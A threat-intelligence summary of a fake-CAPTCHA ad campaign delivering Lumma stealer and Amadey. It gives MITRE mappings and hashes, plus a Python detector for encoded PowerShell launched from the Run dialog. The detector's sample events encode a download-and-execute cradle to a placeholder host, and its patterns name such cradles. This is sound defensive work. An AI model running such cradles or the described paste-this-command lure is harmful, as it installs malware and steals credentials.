Lumma/Amadey: Fake CAPTCHAs Test Your Humanity

Researchers identified a campaign that distributes Lumma stealer and the Amadey Trojan via fake CAPTCHAs embedded in ad networks, expanding beyond gaming sites to adult, file-sharing, betting, and other platforms. The operation uses deceptive redirects and PowerShell-based payloads, exfiltrating credentials and data while sometimes installing Remcos for full remote access and manipulating BitLocker To Go to steal crypto-related data. #LummaStealer #AmadeyTrojan #FakeCaptcha #Remcos #BitLockerToGo #PowerShell #AdNetworks #Brazil #Spain #Italy #Russia

Keypoints

  • Fake CAPTCHA acts as the initial infection vector for Lumma stealer and Amadey Trojan via ad networks and redirects.
  • The campaign expanded from cracked-game sites to adult sites, file-sharing services, betting platforms, anime resources, and web apps monetizing traffic.
  • Payloads delivered include Lumma stealer and Amadey Trojan through CAPTCHA-driven scripts and deceptive prompts.
  • Users are prompted to perform unsafe actions, such as copying a PowerShell command to the clipboard and executing it.
  • Lumma stealer uses BitLocker To Go to access and modify files and to manipulate the registry, facilitating theft of crypto-related data.
  • Amadey Trojan can substitute clipboard data, take screenshots, and download Remcos for full device control.
  • From Sept 22 to Oct 14, 2024, over 140,000 users encountered ad scripts, with more than 20,000 redirected to infected sites, notably affecting Brazil, Spain, Italy, and Russia.
  • Ad networks are exploited to redirect users and perform unsafe actions, boosting potential revenue for operators.

MITRE Techniques

  • [T1059.001] PowerShell – Used to execute malicious commands through Base64-encoded scripts. ‘powershell.exe -eC bQBzAGgAdABhA<…>MAIgA=’
  • [T1003] Credential Dumping – Steals credentials from browsers and password managers.
  • [T1486] Data Encrypted for Impact – Manipulates BitLocker To Go to access and modify files.
  • [T1219] Remote Access Tools – Amadey can download Remcos for full access to the victim’s device.
  • [T1041] Exfiltration Over Command and Control Channel – Steals data and sends it to the attacker’s server.
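The keypoint about victims pasting a PowerShell command into the Run dialog and the T1059.001 entry above both come down to one observable: `powershell.exe` started from an interactive parent with a Base64 `-EncodedCommand` argument. The following detection sketch, added here as an illustration and not code from the report or from Kaspersky, decodes that argument (Base64 over UTF-16LE, which is what PowerShell expects), scores the decoded script for generic download-and-run features, and weights launches whose parent is `explorer.exe` or a browser. The sample events, the parent-process list, the pattern list and the alert threshold are all constructed assumptions for the example; tune them to your own telemetry.

```python
import base64
import binascii
import re

# PowerShell accepts -EncodedCommand by unambiguous prefix (-e, -ec, -enc, ...).
# The pattern deliberately does not match -ep / -ExecutionPolicy or -ex.
ENCODED_SWITCH = re.compile(r"(?i)(?:^|\s)-e(?:c|n\w*)?\s+([A-Za-z0-9+/=]+)")

# Assumed interactive parents: explorer.exe covers the Win+R Run dialog,
# the browsers cover the fake-CAPTCHA page itself.
INTERACTIVE_PARENTS = {"explorer.exe", "chrome.exe", "msedge.exe", "firefox.exe"}

# Generic download-and-execute features in the decoded script (one point each).
SUSPICIOUS_PATTERNS = {
    "download-cradle": re.compile(
        r"(?i)\b(?:iwr|invoke-webrequest|downloadstring|net\.webclient|start-bitstransfer)\b"),
    "in-memory-exec": re.compile(r"(?i)\b(?:iex|invoke-expression)\b"),
    "remote-url": re.compile(r"(?i)https?://"),
    "nested-base64": re.compile(r"(?i)frombase64string"),
}
ALERT_THRESHOLD = 4  # assumed cut-off for this example


def encode_ps(script: str) -> str:
    """Build the argument PowerShell expects after -EncodedCommand: base64(UTF-16LE)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str):
    """Return (found, script). found is False when no encoded switch is present;
    script is None when the argument exists but is not valid base64/UTF-16LE."""
    m = ENCODED_SWITCH.search(cmdline)
    if not m:
        return False, None
    try:
        raw = base64.b64decode(m.group(1), validate=True)
        return True, raw.decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return True, None


def assess(parent: str, cmdline: str) -> dict:
    """Score one process-creation event; higher means more worth a look."""
    found, script = decode_encoded_command(cmdline)
    reasons, score = [], 0
    if not found:
        return {"score": 0, "reasons": reasons, "decoded": None}
    score += 1
    reasons.append("encoded-command")
    if parent.lower() in INTERACTIVE_PARENTS:
        score += 2
        reasons.append("launched-from-" + parent.lower())
    if script is None:
        # A -e argument that will not decode is itself unusual for legitimate tooling.
        score += 2
        reasons.append("undecodable-argument")
    else:
        for name, pattern in SUSPICIOUS_PATTERNS.items():
            if pattern.search(script):
                score += 1
                reasons.append(name)
    return {"score": score, "reasons": reasons, "decoded": script}


def scan(events) -> list:
    """Return the events whose score reaches ALERT_THRESHOLD, with their decoded scripts."""
    alerts = []
    for parent, cmdline in events:
        result = assess(parent, cmdline)
        if result["score"] >= ALERT_THRESHOLD:
            alerts.append({"parent": parent, "cmdline": cmdline, **result})
    return alerts


# Constructed sample events (parent image, command line); the URL is a reserved
# example domain and the scripts are harmless stand-ins, not real payloads.
SAMPLE_EVENTS = [
    ("explorer.exe", "powershell.exe -eC " + encode_ps("iex (iwr 'http://example.invalid/update')")),
    ("svchost.exe", "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1"),
    ("explorer.exe", "powershell.exe -enc " + encode_ps("Get-Date")),
    ("explorer.exe", "powershell.exe -eC notbase64"),
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(alert["score"], alert["reasons"], repr(alert["decoded"]))
```

Against the sample set, the cradle launched from `explorer.exe` and the undecodable argument are raised; the plain `-File` run and the benign `Get-Date` one-liner from the Run dialog are not. The parent-process weighting is what separates the fake-CAPTCHA flow from ordinary scheduled-task or management-agent PowerShell, so keep it even if you replace the pattern list.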

Indicators of Compromise

  • [Hash] Malware samples – e3274bc41f121b918ebb66e2f0cbfe29, 525abe8da7ca32f163d93268c509a4c5

Read more: https://securelist.com/fake-captcha-delivers-lumma-amadey/114312/